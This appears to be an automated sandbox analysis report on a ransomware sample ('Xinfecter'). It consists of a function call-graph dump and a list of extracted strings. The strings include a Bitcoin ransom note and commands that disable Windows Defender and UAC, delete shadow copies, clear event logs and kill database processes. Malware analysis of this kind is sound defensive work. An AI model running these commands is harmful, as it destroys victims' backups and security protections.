95954->95958 95955 8e753f 96109 8ee3b0 28 API calls SimpleUString::operator= 95955->96109 95956->95955 96097 8e7d20 95956->96097 95958->94334 95961 8e74d3 _LStrxfrm 95962 8e751e Concurrency::details::SchedulerBase::Statistics 95961->95962 95963 965942 messages 26 API calls 95961->95963 95962->94334 95963->95955 95966 8e1c2b 95964->95966 95975 8e1d1b Concurrency::details::SchedulerBase::Statistics _LStrxfrm 95964->95975 95965 8e1da8 96018 8ee3b0 28 API calls SimpleUString::operator= 95965->96018 95966->95965 95969 8e1c9c 95966->95969 95970 8e1cc6 95966->95970 95974 8e1cad _LStrxfrm 95966->95974 95966->95975 95971 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 95969->95971 95972 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 95970->95972 95970->95974 95971->95974 95972->95974 95973 965942 messages 26 API calls 95973->95965 95974->95973 95974->95975 95975->95884 96019 8bcae0 95976->96019 95979 8f4f60 28 API calls 95980 8c2fa0 95979->95980 95981 8e6e80 30 API calls 95980->95981 95982 8c2595 95981->95982 95983 8f7340 95982->95983 96028 8ea110 95983->96028 95985 8f73ac 95985->95897 96039 8fc4e0 95986->96039 95989 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 95990 8fbf99 95989->95990 95991 8fbfb2 95990->95991 95992 8f4f60 28 API calls 95990->95992 95993 8fc4e0 28 API calls 95991->95993 95992->95991 95994 8fbfea 95993->95994 96042 8fbd40 95994->96042 95996 8fc049 96045 8fbc80 95996->96045 96000 8fc08f 96001 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 96000->96001 96002 8fc0b2 96001->96002 96003 8fc0cb 96002->96003 96004 8f4f60 28 API calls 96002->96004 96062 8fcc30 96003->96062 96004->96003 96006 8fc0ff 96083 8fbe00 96006->96083 96008 8fc117 96009 8fbd40 22 API calls 96008->96009 96010 8fc133 96009->96010 96011 8fbc80 22 API calls 96010->96011 96012 8fc143 96011->96012 96013 8fde80 30 API calls 96012->96013 96014 8fc14b 96013->96014 96014->95907 96015->95886 96016->95926 96017->95903 96020 8f4f60 28 API calls 96019->96020 96021 8bcb17 96020->96021 96022 8f4f60 28 API calls 96021->96022 96023 8bcb21 96022->96023 96024 8f4f60 28 API calls 96023->96024 96025 8bcb85 96024->96025 96026 8f4f60 28 API calls 96025->96026 96027 8bcbc4 96026->96027 96027->95979 96029 8ea14f 96028->96029 96030 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 96029->96030 96031 8ea15f Concurrency::details::QuickBitSet::QuickBitSet 96030->96031 96032 8ea1c8 96031->96032 96033 918730 _MREFOpen@16 24 API calls 96031->96033 96035 8ea1ea 96032->96035 96038 8b2140 26 API calls 4 library calls 96032->96038 96033->96032 96036 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 96035->96036 96037 8ea26b 96036->96037 96037->95985 96038->96035 96040 8f4f60 28 API calls 96039->96040 96041 8fbf7e 96040->96041 96041->95989 96043 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 96042->96043 96044 8fbd6f 96043->96044 96044->95996 96046 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 96045->96046 96047 8fbcb2 96046->96047 96048 8fde80 96047->96048 96049 8fdec7 96048->96049 96050 8fdf06 96049->96050 96053 8fded9 96049->96053 96051 8e23a0 _MREFOpen@16 28 API calls 96050->96051 96052 8fdf13 96051->96052 96091 8b5930 28 API calls _MREFOpen@16 96052->96091 96087 8ff1e0 96053->96087 96056 8fdf26 96092 958621 RaiseException 96056->96092 96059 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 96060 8fdf00 96059->96060 96060->96000 96061 8fdf34 96061->96000 96063 8fc4e0 28 API calls 96062->96063 96064 8fcc6d 96063->96064 96093 9596fb RaiseException 6 library calls 96064->96093 96066 8fccca 96067 8fcd77 96066->96067 96072 8fccdb 96066->96072 96068 8e23a0 _MREFOpen@16 28 API calls 96067->96068 96069 8fcd84 96068->96069 96094 8b5930 28 API calls _MREFOpen@16 96069->96094 96071 8fcd94 96095 958621 RaiseException 96071->96095 96075 8fbe00 22 API calls 96072->96075 96074 8fcda2 96096 8f3900 26 API calls 2 library calls 96074->96096 96077 8fcd38 96075->96077 96078 8fde80 30 API calls 96077->96078 96079 8fcd47 96078->96079 96081 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 96079->96081 96080 8fcddf Concurrency::details::SchedulerBase::Statistics 96080->96006 96082 8fcd71 96081->96082 96082->96006 96084 8fbe30 96083->96084 96085 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 96084->96085 96086 8fbe40 96085->96086 96086->96008 96088 8ff1fc 96087->96088 96090 8fdee4 96087->96090 96089 918730 _MREFOpen@16 24 API calls 96088->96089 96088->96090 96089->96090 96090->96059 96091->96056 96092->96061 96093->96066 96094->96071 96095->96074 96096->96080 96098 8e7d35 96097->96098 96099 8e7d30 96097->96099 96098->96099 96100 8e7d64 96098->96100 96101 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 96099->96101 96102 8e7d75 96100->96102 96104 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 96100->96104 96103 8e7d4e 96101->96103 96102->95961 96105 8e7d57 96103->96105 96107 965942 messages 26 API calls 96103->96107 96106 8e7d6e 96104->96106 96105->95961 96106->95961 96108 8e7d80 96107->96108 96111 93d3b1 GetFileAttributesW 96110->96111 96112 93d3af 96110->96112 96113 93d3c2 96111->96113 96114 93d3d4 96111->96114 96112->96111 96134 93d240 52 API calls 4 library calls 96113->96134 96135 93d140 52 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 96114->96135 96117 93d3cc 96118 93d4b5 96117->96118 96119 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 96118->96119 96121 8b4a32 96119->96121 96120 93d3db 96120->96118 96120->96120 96122 93d41d 96120->96122 96121->93350 96123 8e7430 SimpleUString::operator= 28 API calls 96122->96123 96124 93d42b CreateFileW 96123->96124 96125 8b49c0 48 API calls 96124->96125 96126 93d464 96125->96126 96127 93d469 96126->96127 96128 93d478 96126->96128 96136 93d240 52 API calls 4 library calls 96127->96136 96137 93d060 CreateFileW DeviceIoControl CloseHandle Concurrency::details::SubAllocator::StaticAlloc 96128->96137 96131 93d47e 96132 93d4a1 CloseHandle 96131->96132 96133 93d485 CloseHandle 96131->96133 96132->96118 96133->96118 96134->96117 96135->96120 96136->96117 96137->96131 96142 8e16fc 96138->96142 96145 8e17b6 Concurrency::details::SchedulerBase::Statistics _LStrxfrm 96138->96145 96139 8e1855 96158 8ee3b0 28 API calls SimpleUString::operator= 96139->96158 96142->96139 96143 8e7d20 SimpleUString::operator= 28 API calls 96142->96143 96144 8e176b _LStrxfrm 96142->96144 96142->96145 96143->96144 96144->96145 96146 965942 messages 26 API calls 96144->96146 96145->94404 96146->96139 96148 8e8940 96147->96148 96152 8e8908 SimpleUString::operator= 96147->96152 96149 8e894f 96148->96149 96150 8e8a63 96148->96150 96154 8e7d20 SimpleUString::operator= 28 API calls 96149->96154 96159 8ee3b0 28 API calls SimpleUString::operator= 96150->96159 96152->94406 96153 965942 messages 26 API calls 96155 8e8a6d 96153->96155 96156 8e899d _LStrxfrm 96154->96156 96156->96153 96157 8e8a16 Concurrency::details::SchedulerBase::Statistics _LStrxfrm 96156->96157 96157->94406 96161 8ec295 96160->96161 96162 8ec3a0 96160->96162 96165 8ec2dc 96161->96165 96166 8ec306 96161->96166 96173 8ee3b0 28 API calls SimpleUString::operator= 96162->96173 96164 965942 messages 26 API calls 96167 8ec3aa 96164->96167 96168 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 96165->96168 96169 94109a Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 96166->96169 96172 8ec2ed _LStrxfrm 96166->96172 96168->96172 96169->96172 96170 8ec37b _LStrxfrm 96170->94420 96171 8ec362 Concurrency::details::SchedulerBase::Statistics 96171->94420 96172->96164 96172->96170 96172->96171 96174->94429 96176 8ec0c8 96175->96176 96179 8ebfcf Concurrency::details::QuickBitSet::QuickBitSet 96175->96179 96177 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 96176->96177 96178 8ec0dc 96177->96178 96178->94515 96179->96176 96180 8ec017 96179->96180 96184 8ec044 96179->96184 96180->96176 96181 8ec0ad 96180->96181 96182 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 96181->96182 96183 8ec0c4 96182->96183 96183->94515 96185 8ec093 96184->96185 96187 8ec078 96184->96187 96186 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 96185->96186 96188 8ec0a9 96186->96188 96189 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 96187->96189 96188->94515 96190 8ec08f 96189->96190 96190->94515 96192 8ea650 96191->96192 96192->96192 96193 8e16e0 28 API calls 96192->96193 96194 8ea674 96193->96194 96245->94576 96246->94588 96248 8e815d 96247->96248 96249 8e81fa 96247->96249 96248->96249 96255 8e8167 96248->96255 96250 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 96249->96250 96251 8e8207 96250->96251 96252 8e81e8 96255->96252 96256 8e81b0 96255->96256 96257 8e8196 96255->96257 96258 8e81d1 96256->96258 96260 9660f2 90 API calls 96256->96260 96257->96252 96259 8e819b 96257->96259 96267 8e82b7 96266->96267 96268 8e8290 96266->96268 96269 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 96267->96269 96706 9622c7 26 API calls 2 library calls 96268->96706 96291->94521 96292->94534 96706->96267 96711->94840 96712->94847 96713->94841 96715 8ee86a 96714->96715 96722 8ee7d9 SimpleUString::operator= _LStrxfrm 96714->96722 96716 8ee87b 96715->96716 96717 8ee960 96715->96717 96719 8e7d20 SimpleUString::operator= 28 API calls 96716->96719 96725 8ee3b0 28 API calls SimpleUString::operator= 96717->96725 96722->94850 97224 964f1a 97225 964f26 ___scrt_is_nonwritable_in_current_image 97224->97225 97226 964f32 97225->97226 97228 964f55 97225->97228 97227 9661c3 __Wcrtomb 20 API calls 97226->97227 97229 964f37 97227->97229 97247 965285 97228->97247 97354 965932 26 API calls messages 97229->97354 97234 964f42 std::_Xfsopen 97235 964f9f 97235->97234 97316 96ca1b EnterCriticalSection 97235->97316 97237 964fce 97238 9661c3 __Wcrtomb 20 API calls 97237->97238 97239 964fd8 97238->97239 97317 965042 GetCurrentProcess DuplicateHandle 97239->97317 97242 9661c3 __Wcrtomb 20 API calls 97245 964ff8 97242->97245 97243 965022 97355 965039 LeaveCriticalSection std::_Lockit::~_Lockit 97243->97355 97245->97243 97246 9760dd Concurrency::details::_CancellationTokenState::_RegisterCallback 31 API calls 97245->97246 97246->97245 97249 96529b 97247->97249 97248 9661c3 __Wcrtomb 20 API calls 97250 9652b0 97248->97250 97249->97248 97251 964f61 97249->97251 97356 965932 26 API calls messages 97250->97356 97251->97234 97253 9776b6 97251->97253 97254 9776c2 ___scrt_is_nonwritable_in_current_image 97253->97254 97255 9776f1 97254->97255 97256 9776d0 97254->97256 97258 97770c 97255->97258 97260 97773c CreatePipe 97255->97260 97257 9661b0 __dosmaperr 20 API calls 97256->97257 97259 9776d5 97257->97259 97261 9661b0 __dosmaperr 20 API calls 97258->97261 97262 9661c3 __Wcrtomb 20 API calls 97259->97262 97263 97776e GetLastError 97260->97263 97264 97777d 97260->97264 97265 977711 97261->97265 97266 9776dd 97262->97266 97359 96618d 20 API calls 3 library calls 97263->97359 97360 97d47e 97264->97360 97269 9661c3 __Wcrtomb 20 API calls 97265->97269 97357 965932 26 API calls messages 97266->97357 97272 977719 97269->97272 97271 977782 97273 97778b 97271->97273 97373 977822 LeaveCriticalSection __wsopen_s 97271->97373 97358 965932 26 API calls messages 97272->97358 97275 9661c3 __Wcrtomb 20 API calls 97273->97275 97278 977790 97275->97278 97277 9777f3 97279 97d47e __wsopen_s 24 API calls 97277->97279 97281 9661b0 __dosmaperr 20 API calls 97278->97281 97282 9777f8 97279->97282 97280 9776e8 std::_Xfsopen 97280->97235 97283 97779b CloseHandle CloseHandle 97281->97283 97282->97273 97284 97782a 97282->97284 97283->97280 97374 977932 LeaveCriticalSection __wsopen_s 97284->97374 97286 977870 97375 970c7a 26 API calls 2 library calls 97286->97375 97288 97787c 97289 97793a 97288->97289 97291 977885 97288->97291 97385 96595f 11 API calls _abort 97289->97385 97376 97d3c7 97291->97376 97294 977944 ___scrt_is_nonwritable_in_current_image 97296 97796d 97294->97296 97297 97795d 97294->97297 97295 97d3c7 __wsopen_s 21 API calls 97295->97280 97298 977985 97296->97298 97299 977975 97296->97299 97300 9661c3 __Wcrtomb 20 API calls 97297->97300 97302 977a25 97298->97302 97305 9779b7 97298->97305 97301 9661c3 __Wcrtomb 20 API calls 97299->97301 97303 977962 97300->97303 97308 97797a std::_Xfsopen 97301->97308 97304 9661c3 __Wcrtomb 20 API calls 97302->97304 97388 965932 26 API calls messages 97303->97388 97304->97303 97386 974e7f 71 API calls 2 library calls 97305->97386 97308->97235 97309 9779c3 97309->97308 97310 974d22 std::_Xfsopen 23 API calls 97309->97310 97311 9779dc 97310->97311 97312 9779e4 97311->97312 97313 9779f1 97311->97313 97314 9661c3 __Wcrtomb 20 API calls 97312->97314 97387 977a1b LeaveCriticalSection std::_Xfsopen 97313->97387 97314->97308 97316->97237 97318 965092 97317->97318 97319 96508b 97317->97319 97320 9760dd Concurrency::details::_CancellationTokenState::_RegisterCallback 31 API calls 97318->97320 97322 965266 CloseHandle 97319->97322 97323 964feb 97319->97323 97321 965099 97320->97321 97396 977a3d 97321->97396 97322->97323 97323->97242 97325 9650a7 97325->97319 97326 96549c 29 API calls 97325->97326 97327 9650b7 97326->97327 97344 9650c1 97327->97344 97418 9652db 97327->97418 97329 9650cd Concurrency::details::QuickBitSet::QuickBitSet 97331 975508 std::_Locinfo::_Locinfo_ctor 20 API calls 97329->97331 97330 9625ba Concurrency::details::_CancellationTokenState::_RegisterCallback 93 API calls 97330->97319 97332 96516b 97331->97332 97333 965232 97332->97333 97334 9729c2 ___std_exception_copy 26 API calls 97332->97334 97336 975565 _free 20 API calls 97333->97336 97335 965184 97334->97335 97337 965278 97335->97337 97339 9773e8 26 API calls 97335->97339 97338 96523d 97336->97338 97444 96595f 11 API calls _abort 97337->97444 97340 975565 _free 20 API calls 97338->97340 97343 96519b 97339->97343 97340->97344 97342 965284 97343->97337 97345 9773e8 26 API calls 97343->97345 97344->97319 97344->97330 97346 9651b0 97345->97346 97346->97337 97347 9651bb 97346->97347 97425 965319 97347->97425 97350 9651cb CreateProcessA 97351 965210 CloseHandle 97350->97351 97352 965209 97350->97352 97351->97352 97353 975565 _free 20 API calls 97352->97353 97353->97333 97354->97234 97355->97234 97356->97251 97357->97280 97358->97280 97359->97280 97361 97d48a ___scrt_is_nonwritable_in_current_image 97360->97361 97389 96ca1b EnterCriticalSection 97361->97389 97363 97d4d8 97390 97d587 97363->97390 97365 97d4b6 97393 97d25d 21 API calls 3 library calls 97365->97393 97366 97d491 97366->97363 97366->97365 97370 97d524 EnterCriticalSection 97366->97370 97367 97d501 std::_Xfsopen 97367->97271 97369 97d4bb 97369->97363 97394 97d3a4 EnterCriticalSection 97369->97394 97370->97363 97371 97d531 LeaveCriticalSection 97370->97371 97371->97366 97373->97277 97374->97286 97375->97288 97377 97d3d6 97376->97377 97378 97d43f 97376->97378 97377->97378 97383 97d3fc __wsopen_s 97377->97383 97379 9661c3 __Wcrtomb 20 API calls 97378->97379 97380 97d444 97379->97380 97381 9661b0 __dosmaperr 20 API calls 97380->97381 97382 97790f 97381->97382 97382->97295 97383->97382 97384 97d426 SetStdHandle 97383->97384 97384->97382 97385->97294 97386->97309 97387->97308 97388->97308 97389->97366 97395 96ca63 LeaveCriticalSection 97390->97395 97392 97d58e 97392->97367 97393->97369 97394->97363 97395->97392 97397 977945 ___scrt_is_nonwritable_in_current_image 97396->97397 97398 97796d 97397->97398 97399 97795d 97397->97399 97400 977985 97398->97400 97401 977975 97398->97401 97402 9661c3 __Wcrtomb 20 API calls 97399->97402 97404 977a25 97400->97404 97407 9779b7 97400->97407 97403 9661c3 __Wcrtomb 20 API calls 97401->97403 97405 977962 97402->97405 97410 97797a std::_Xfsopen 97403->97410 97406 9661c3 __Wcrtomb 20 API calls 97404->97406 97447 965932 26 API calls messages 97405->97447 97406->97405 97445 974e7f 71 API calls 2 library calls 97407->97445 97410->97325 97411 9779c3 97411->97410 97412 974d22 std::_Xfsopen 23 API calls 97411->97412 97413 9779dc 97412->97413 97414 9779e4 97413->97414 97415 9779f1 97413->97415 97416 9661c3 __Wcrtomb 20 API calls 97414->97416 97446 977a1b LeaveCriticalSection std::_Xfsopen 97415->97446 97416->97410 97419 97734a 77 API calls 97418->97419 97420 9652f6 97419->97420 97421 965302 97420->97421 97422 96530e 97420->97422 97421->97329 97448 96595f 11 API calls _abort 97422->97448 97424 965318 97426 977661 33 API calls 97425->97426 97427 96532c 97426->97427 97428 9651c4 97427->97428 97429 975508 std::_Locinfo::_Locinfo_ctor 20 API calls 97427->97429 97428->97333 97428->97350 97430 965347 97429->97430 97431 9653ff 97430->97431 97449 96541b 77 API calls std::_Locinfo::_W_Getmonths 97430->97449 97432 975565 _free 20 API calls 97431->97432 97432->97428 97435 9653f1 97437 975565 _free 20 API calls 97435->97437 97437->97431 97438 965410 97452 96595f 11 API calls _abort 97438->97452 97440 96541a 97441 9773e8 26 API calls 97442 965359 97441->97442 97442->97435 97442->97438 97442->97441 97443 977661 33 API calls 97442->97443 97450 965459 64 API calls 97442->97450 97451 9774ef 20 API calls __Wcrtomb 97442->97451 97443->97442 97444->97342 97445->97411 97446->97410 97447->97410 97448->97424 97449->97442 97450->97442 97451->97442 97452->97440 97453 8c6b20 97469 8e7160 28 API calls 4 library calls 97453->97469 97455 8c6b3f 97455->97453 97460 8c6b45 97455->97460 97456 8c6bc1 InternetConnectW 97457 8c6bf2 97456->97457 97458 8e1fd0 collate 28 API calls 97457->97458 97464 8c6a9d Concurrency::details::SchedulerBase::Statistics 97458->97464 97460->97456 97461 8c6bb5 97460->97461 97470 8e7160 28 API calls 4 library calls 97460->97470 97461->97456 97462 8c71bd 97463 965942 messages 26 API calls 97462->97463 97466 8c71c2 97463->97466 97464->97462 97465 8c6aeb Concurrency::details::SchedulerBase::Statistics 97464->97465 97467 940dbb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 97465->97467 97468 8c6ea2 97467->97468 97469->97455 97470->97460 97471 973eca 97472 973ea4 __fread_nolock 26 API calls 97471->97472 97473 973ed8 97472->97473 97474 973ee6 97473->97474 97475 973f05 97473->97475 97476 9661c3 __Wcrtomb 20 API calls 97474->97476 97477 973f12 97475->97477 97478 973f1f 97475->97478 97481 973eeb 97476->97481 97479 9661c3 __Wcrtomb 20 API calls 97477->97479 97478->97481 97482 980447 __fread_nolock 26 API calls 97478->97482 97483 973fa2 97478->97483 97484 973faf 97478->97484 97479->97481 97482->97483 97483->97484 97497 976336 21 API calls 2 library calls 97483->97497 97486 9740f0 97484->97486 97487 973ea4 __fread_nolock 26 API calls 97486->97487 97488 9740ff 97487->97488 97489 9741a3 97488->97489 97490 974111 97488->97490 97491 975d3c __wsopen_s 88 API calls 97489->97491 97492 97412e 97490->97492 97495 974154 97490->97495 97494 97413b 97491->97494 97493 975d3c __wsopen_s 88 API calls 97492->97493 97493->97494 97494->97481 97495->97494 97498 9797da 97495->97498 97497->97484 97501 979657 97498->97501 97500 9797f0 97500->97494 97502 979663 ___scrt_is_nonwritable_in_current_image 97501->97502 97503 979683 97502->97503 97504 97966b 97502->97504 97506 979737 97503->97506 97510 9796bb 97503->97510 97505 9661b0 __dosmaperr 20 API calls 97504->97505 97507 979670 97505->97507 97508 9661b0 __dosmaperr 20 API calls 97506->97508 97511 9661c3 __Wcrtomb 20 API calls 97507->97511 97509 97973c 97508->97509 97512 9661c3 __Wcrtomb 20 API calls 97509->97512 97526 97d3a4 EnterCriticalSection 97510->97526 97514 979678 std::_Xfsopen 97511->97514 97515 979744 97512->97515 97514->97500 97528 965932 26 API calls messages 97515->97528 97516 9796c1 97518 9796e5 97516->97518 97519 9796fa 97516->97519 97520 9661c3 __Wcrtomb 20 API calls 97518->97520 97521 97975c __wsopen_s 28 API calls 97519->97521 97522 9796ea 97520->97522 97523 9796f5 97521->97523 97524 9661b0 __dosmaperr 20 API calls 97522->97524 97527 97972f LeaveCriticalSection __wsopen_s 97523->97527 97524->97523 97526->97516 97527->97514 97528->97514 97529 97537a 97534 9750b1 97529->97534 97533 9753a2 97539 9750e2 try_get_first_available_module 97534->97539 97535 9661c3 __Wcrtomb 20 API calls 97536 9752e1 97535->97536 97552 965932 26 API calls messages 97536->97552 97538 975236 97538->97533 97546 9811b9 97538->97546 97542 97522b 97539->97542 97549 98049d 66 API calls 2 library calls 97539->97549 97541 97527f 97541->97542 97550 98049d 66 API calls 2 library calls 97541->97550 97542->97535 97542->97538 97544 97529e 97544->97542 97551 98049d 66 API calls 2 library calls 97544->97551 97553 980845 97546->97553 97548 9811d4 97548->97533 97549->97541 97550->97544 97551->97542 97552->97538 97556 980851 ___scrt_is_nonwritable_in_current_image 97553->97556 97554 98085f 97555 9661c3 __Wcrtomb 20 API calls 97554->97555 97557 980864 97555->97557 97556->97554 97558 980898 97556->97558 97611 965932 26 API calls messages 97557->97611 97564 980e90 97558->97564 97562 98086e std::_Xfsopen 97562->97548 97613 980bf3 97564->97613 97567 980edb 97569 97d47e __wsopen_s 24 API calls 97567->97569 97568 980ec2 97570 9661b0 __dosmaperr 20 API calls 97568->97570 97571 980ee0 97569->97571 97572 980ec7 97570->97572 97573 980ee9 97571->97573 97574 980f00 97571->97574 97575 9661c3 __Wcrtomb 20 API calls 97572->97575 97576 9661b0 __dosmaperr 20 API calls 97573->97576 97631 980b5e CreateFileW 97574->97631 97602 9808bc 97575->97602 97578 980eee 97576->97578 97579 9661c3 __Wcrtomb 20 API calls 97578->97579 97579->97572 97580 980fb6 GetFileType 97581 981008 97580->97581 97582 980fc1 GetLastError 97580->97582 97590 97d3c7 __wsopen_s 21 API calls 97581->97590 97649 96618d 20 API calls 3 library calls 97582->97649 97583 980f8b GetLastError 97648 96618d 20 API calls 3 library calls 97583->97648 97586 980f39 97586->97580 97586->97583 97647 980b5e CreateFileW 97586->97647 97588 980fcf CloseHandle 97588->97572 97591 980ff8 97588->97591 97589 980f7e 97589->97580 97589->97583 97592 981029 97590->97592 97593 9661c3 __Wcrtomb 20 API calls 97591->97593 97594 981075 97592->97594 97632 980d6f 97592->97632 97595 980ffd 97593->97595 97599 9810a2 97594->97599 97650 980911 97 API calls 4 library calls 97594->97650 97595->97572 97598 98109b 97598->97599 97600 9810b3 97598->97600 97601 97615c __wsopen_s 29 API calls 97599->97601 97600->97602 97603 981131 CloseHandle 97600->97603 97601->97602 97612 9808e5 LeaveCriticalSection __wsopen_s 97602->97612 97651 980b5e CreateFileW 97603->97651 97605 98115c 97606 981192 97605->97606 97607 981166 GetLastError 97605->97607 97606->97602 97652 96618d 20 API calls 3 library calls 97607->97652 97609 981172 97653 97d590 21 API calls 3 library calls 97609->97653 97611->97562 97612->97562 97614 980c2e 97613->97614 97615 980c14 97613->97615 97654 980b83 97614->97654 97615->97614 97617 9661c3 __Wcrtomb 20 API calls 97615->97617 97618 980c23 97617->97618 97661 965932 26 API calls messages 97618->97661 97620 980c66 97621 980c95 97620->97621 97623 9661c3 __Wcrtomb 20 API calls 97620->97623 97628 980ce8 97621->97628 97663 970c7a 26 API calls 2 library calls 97621->97663 97625 980c8a 97623->97625 97624 980ce3 97626 980d62 97624->97626 97624->97628 97662 965932 26 API calls messages 97625->97662 97664 96595f 11 API calls _abort 97626->97664 97628->97567 97628->97568 97630 980d6e 97631->97586 97633 980d99 97632->97633 97642 980d95 97632->97642 97634 9797f5 __wsopen_s 28 API calls 97633->97634 97633->97642 97635 980dab 97634->97635 97636 980dbb 97635->97636 97637 980dd1 97635->97637 97638 9661b0 __dosmaperr 20 API calls 97636->97638 97639 9792a2 __fread_nolock 38 API calls 97637->97639 97640 980dc0 97638->97640 97641 980de3 97639->97641 97640->97642 97644 9661c3 __Wcrtomb 20 API calls 97640->97644 97646 980df9 97641->97646 97666 983c41 88 API calls 5 library calls 97641->97666 97642->97594 97643 9797f5 __wsopen_s 28 API calls 97643->97640 97644->97642 97646->97640 97646->97643 97647->97589 97648->97572 97649->97588 97650->97598 97651->97605 97652->97609 97653->97606 97656 980b9b 97654->97656 97655 980bb6 97655->97620 97656->97655 97657 9661c3 __Wcrtomb 20 API calls 97656->97657 97658 980bda 97657->97658 97665 965932 26 API calls messages 97658->97665 97660 980be5 97660->97620 97661->97614 97662->97621 97663->97624 97664->97630 97665->97660 97666->97646

                                      Executed Functions

                                      Function 008D4819 Relevance: 183.8, APIs: 13, Strings: 88, Instructions: 7001COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ ",$ /f$ ::$ <span class="spnn">$ ="$" start= auto$" start=auto$", $","$"cmd.exe","$"disaust",$"ren_end",$.1UI$.txt$77H75$:: $:\Documents and Settings\$:\Users\$:\Windows\SysMain.sys$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$=" $All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Dflt$Lpath$Second Email :$Telegram , ID :$Version 5.$X$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\AppData\SysMain.sys$\Start Menu\Programs\Startup\Xinfecter.exe$_Mail-$_[ID-$alterencsz="$alterencsz="",$asykat$asykat$c$c$c:\R_cfg.ini$c:\skips.txt$c_drive="$c_drive=""$c_end$dcdcf$dismx$emptyString$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$fpath="$fpath=""$h2gq$invalid stod argument$k2ba8v$mode="$mode="",$mode="fast",$mode="slow",$n7t0$nodisk$noshare$p2h6$r1d8la$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$sc create SqlBakup binPath= "$skip_path="$skip_path=""$spath$spath="$spath=""$stod argument out of range$taskkill /PID $taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$tasklist /v /fo csv | findstr /i "dcdcf"$thd_per_drv="$thd_per_drv=""$total_thd="$total_thd=""$u4g8$ver
                                      • API String ID: 0-3497711092
                                      • Opcode ID: 26367c3043a6df633643a32f01cb37bbc408008916b8b53f7dea2a3ad82f290e
                                      • Instruction ID: 239223329abedc3ee9309d629f0fb44df3a89624e2a3f47f294104d1fa27a58c
                                      • Opcode Fuzzy Hash: 26367c3043a6df633643a32f01cb37bbc408008916b8b53f7dea2a3ad82f290e
                                      • Instruction Fuzzy Hash: 30D3F430E10258DBDF14DB68CD46BDDBBB1FF85314F508299E409E7292EB749A84CB92
                                      Function 008DC940 Relevance: 87.3, APIs: 5, Strings: 44, Instructions: 1531COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
